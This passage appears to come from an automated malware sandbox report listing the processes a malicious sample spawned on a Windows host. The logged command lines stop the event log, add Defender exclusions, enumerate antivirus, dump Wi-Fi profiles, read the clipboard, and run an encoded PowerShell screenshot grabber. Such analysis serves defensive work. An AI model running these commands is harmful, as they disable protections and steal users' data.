                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:63
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:64
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:65
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:66
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:67
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                            Imagebase:0x7ff7f5270000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:68
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:69
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\sc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\sc.exe start "NPYIAYNC"
                                                            Imagebase:0x7ff7f5270000
                                                            File size:72'192 bytes
                                                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:70
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:71
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:72
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:73
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:74
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:75
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:76
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:77
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:78
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:79
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\tasklist.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:tasklist /FO LIST
                                                            Imagebase:0x7ff774ad0000
                                                            File size:106'496 bytes
                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:80
                                                            Start time:15:01:17
                                                            Start date:07/01/2025
                                                            Path:C:\ProgramData\Microsoft\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\ProgramData\Microsoft\svchost.exe
                                                            Imagebase:0x7ff6c6b90000
                                                            File size:5'264'896 bytes
                                                            MD5 hash:C289921058A4B38BDBD1373A0CBB757D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:81
                                                            Start time:15:01:18
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff6d1340000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:82
                                                            Start time:15:01:18
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\tasklist.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:tasklist /FO LIST
                                                            Imagebase:0x7ff774ad0000
                                                            File size:106'496 bytes
                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:83
                                                            Start time:15:01:18
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Get-Clipboard
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:84
                                                            Start time:15:01:18
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\tasklist.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:tasklist /FO LIST
                                                            Imagebase:0x7ff774ad0000
                                                            File size:106'496 bytes
                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:85
                                                            Start time:15:01:18
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\netsh.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:netsh wlan show profile
                                                            Imagebase:0x7ff670b50000
                                                            File size:96'768 bytes
                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:86
                                                            Start time:15:01:18
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                            Imagebase:0x7ff690e90000
                                                            File size:576'000 bytes
                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:87
                                                            Start time:15:01:18
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:88
                                                            Start time:15:01:18
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:89
                                                            Start time:15:01:19
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:90
                                                            Start time:15:01:19
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:91
                                                            Start time:15:01:19
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:92
                                                            Start time:15:01:20
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:93
                                                            Start time:15:01:20
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:94
                                                            Start time:15:01:20
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                            Imagebase:0x7ff7b3670000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:95
                                                            Start time:15:01:20
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\systeminfo.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:systeminfo
                                                            Imagebase:0x7ff657250000
                                                            File size:110'080 bytes
                                                            MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:96
                                                            Start time:15:01:20
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff6d1340000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:97
                                                            Start time:15:01:20
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:98
                                                            Start time:15:01:20
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:99
                                                            Start time:15:01:20
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                            Imagebase:0x7ff697290000
                                                            File size:77'312 bytes
                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:100
                                                            Start time:15:01:21
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIA